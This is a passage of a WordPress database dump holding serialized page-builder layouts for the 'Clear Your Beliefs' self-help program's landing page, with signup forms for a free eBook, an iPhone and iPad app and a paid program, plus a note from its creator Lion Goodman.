psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1199, 1680, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="641" height="155" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:444:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:8px; margin-top: 88px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1369, 1815, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1170:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1203, 1681, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:645:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column 